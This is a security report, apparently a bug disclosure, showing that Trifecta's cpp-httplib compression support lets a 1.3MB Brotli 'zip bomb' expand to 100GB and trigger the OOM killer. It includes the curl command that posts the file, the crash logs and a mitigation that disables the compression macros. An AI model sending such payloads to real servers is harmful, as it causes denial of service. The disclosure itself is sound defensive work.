Trifecta allows zlib (gzip) and Brotli (br) compression/decompression of requests and responses when, at build time, it is detected that the libraries to do this are present on the system.

However, in this case, this feature makes Trifecta vulnerable to a "zip bomb" attack, where a crafted highly compressed file is uploaded, and the app is tricked into trying to uncompress it in memory.

Taking the file from here and bunzipping it, we have a 1.3MB Brotli file that uncompresses to 100GB of data. When we send this file, the app will attempt to allocate the entire 100GB worth of memory. My machine is not that large, so this triggers the OOM killer, which then (luckily) kills the Trifecta process.

To demonstrate:

% ~ › curl -H 'Content-Encoding: br' --data-binary @100GB.html.br http://127.0.0.1:8080/trifecta/status
<html>
<head><title>502 Bad Gateway</title></head>
<body>
<center><h1>502 Bad Gateway</h1></center>
<hr><center>nginx/1.25.3</center>
</body>
</html>

% ~/Code/trifecta › ./buildDir/trifecta
Database is in trifecta.sqlite, canonical URL is http://127.0.0.1:3456/
Admin users: admin 
Will listen on http://127.0.0.1:3456
zsh: killed     ./buildDir/trifecta

[ 2961.933094] Out of memory: Killed process 6865 (trifecta) total-vm:6445152kB, anon-rss:2927824kB, file-rss:1920kB, shmem-rss:0kB, UID:1000 pgtables:5848kB oom_score_adj:0

As a mitigation, trifecta should ensure that the following macros are never defined when httplib.h is included:

• CPPHTTPLIB_ZLIB_SUPPORT
• CPPHTTPLIB_BROTLI_SUPPORT

In the example above, the request goes through nginx, but the behavior is the same regardless of whether Trifecta is fronted by nginx or not.